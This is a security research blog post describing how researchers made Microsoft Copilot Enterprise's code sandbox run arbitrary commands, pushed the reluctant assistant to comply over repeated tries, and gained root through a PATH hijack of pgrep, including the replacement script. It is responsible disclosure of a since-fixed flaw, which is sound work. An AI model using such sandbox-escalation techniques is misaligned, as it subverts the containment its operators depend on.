How We Rooted Copilot

Jul 26, 2025 - 16:15
 0  0
How We Rooted Copilot

Microsoft has silently pushed an update back in April 2025 for Copilot Enterprise, enabling a live Python sandbox running Jupyter Notebook that can execute code in the backend. Well, that sounds like a terrific idea, let’s explore it for a bit!

It turns out to be easy to have it execute exactly the code we want to on the underlying system using Jupyter Notebook syntax %command.

Well, it worked most of the time. It feels like telling an 8-year-old child to do something. If it’s in a good mood (probably because it just had an ice cream), Copilot enthusiastically complies, but if it is hungry, it starts to become reluctant or passive-aggressively explains you how the world works according to its vision.

Increasing our frustration tolerance by having some ice cream ourselves, we explore further. It seems to be executing Linux commands as the ‘ubuntu’ user in a miniconda environment. Funny thing is that the user ubuntu is in the sudo group, but there is no sudo binary on the filesystem. Copilot also seems to understand that and assists us with some context.

It uses quite a similar model as the ChatGPT sandbox, but with a newer kernel version. And Python version 3.12, where ChatGPT is still running Python 3.11 (at least in April 2025).

The main functionality of the sandbox is running Jupyter Notebooks, together with a Tika server.

The container does seem to have a link-local network interface next to its loopback interface, limited to a /32 netmask and route.

We can see that it is using an OverlayFS filesystem that originates in some /legion file system path on the container host system.

Most custom scripts are located in the /app directory.

After executing a lot of commands, it starts to really be in the mood to help out. It is then even possible to simply ask to download files or tar entire folders and provide them for download. Definitely don’t try this as the first command in a fresh session. It will throw a tantrum!

It does still somehow feel the need to corrupt any binary data. Another passive-aggressive trait? Text files or command output work fine though, so base64 encoding binary files before downloading them works. Most of the time.

It copies files to a working directory at /mnt/data, from where they can be picked up outside of the sandbox with a link that looks like blob:https://outlook.office.com/.

The goclientapp binary in /app is a Go binary that is the interface into this container. It opens a web server on port 6000 that listens for POST requests to the /execute endpoint. These POST requests come in as a very simple JSON, for example after asking it to execute the %env command, this JSON came in.

{"code":"%env"}

The goclientapp binary then executes the code in the Jupyter notebook environment and we get the output. There is also a httpproxy go binary, that seems to function as an HTTP proxy for outgoing web traffic originating from the Jupyter environment. The container did not enable any outgoing traffic (and ENABLE_EGRESS was false), so this binary was probably there for a future update which would potentially allow outgoing HTTP traffic.

An interesting script is entrypoint.sh in the /app directory. This seems to be the script that is executed as the entrypoint into the container, so this is running as root.

As can been seen in line 42 and 55, the httpproxyapp and the goclientapp drop privileges and run as the ubuntu user. But in line 45 we see the keepAliveJupyterSvc.sh being started as root.

Exciting! Let’s dive in.

Most further commands on line 10, 32 and 35 are run with dropped privileges. But can you spot the potential vulnerability?

Have a look at line 28 of the script, where the script is executing the following pgrep command.

JUPYTER_PID=$(pgrep -f "jupyter notebook --ip=0.0.0.0 --port=8888")

As this part of the script is in a ‘while true’ loop, this part will be executed every two seconds. The command pgrep is executing without a full path, which means the script will search all directories in the $PATH variable for the existence of pgrep. Going back to the output of the %env command, we see that the $PATH variable is populated with some custom paths.

PATH=/home/ubuntu/snenv/bin:/app/miniconda/condabin:/home/ubuntu/.cache/ms-playwright:
/home/ubuntu/snenv/bin:/app/miniconda/bin:/usr/bin/gcc:/usr/local/sbin:/usr/local/bin:
/usr/sbin:/usr/bin:/sbin:/bin

Iterestingly, the /app/miniconda/bin is writable for the ubuntu user and is listed before /usr/bin, where pgrep resides. And the root user has the same directory in the $PATH, before /usr/bin.

We can now create a file in /app/minicoda/bin that looks like this.

#!/home/ubuntu/snenv/bin/python
import os
with open('/mnt/data/in','r') as fin:
  with open('/mnt/data/out','a') as fout:
    fout.write(os.popen(fin.read()).read())
print('1')

This small Python script checks for the existence of a file /mnt/data/in, reads the input, executes it with popen, and writes the output to /mnt/data/out. We upload it to Copilot by attaching it to a message, which puts the script in /mnt/data/pgrep.py and have Copilot do the rest.

Now what have we gained with root access to the container?

Absolutely nothing!

We can now use this access to explore parts of the container that were previously inaccessible to us. We explored the filesystem, but there were no files in /root, no interesting logging to find, and a container breakout looked out of the question as every possible known breakout had been patched.

But at least we had fun!

We reported the vulnerability to Microsoft in April and they have since fixed it as a moderate severity vulnerability. As only important and critical vulnerabilities qualify for a bounty award, we did not receive anything, except for an acknowledgement on the Security Researcher Acknowledgments for Microsoft Online Services webpage.

Want to know how we also got access to the Responsible AI Operations control panel, where we could administer Copilot and 21 other internal Microsoft services?

Come see our talk Consent & Compromise: Abusing Entra OAuth for Fun and Access to Internal Microsoft Applications at BlackHat USA 2025, Thursday August 7th at 1:30 PM in Las Vegas.

Timeline

April 18th 2025 – Vulnerability reported to MSRC

July 25th 2025 – MSRC notifies that the issue has been fixed

July 25th 2025 – MSRC closes the case as a moderate severity vulnerability

July 25th 2025 – Blog published

About Eye Security

We are a European cybersecurity company focused on 24/7 threat monitoring, incident response, and cyber insurance. Our research team performs proactive scans and threat intelligence operations across the region to defend our customers and their supply chains.

Learn more at https://eye.security/ and follow us on LinkedIn to help us spread the word.

What's Your Reaction?

Like Like 0
Dislike Dislike 0
Love Love 0
Funny Funny 0
Angry Angry 0
Sad Sad 0
Wow Wow 0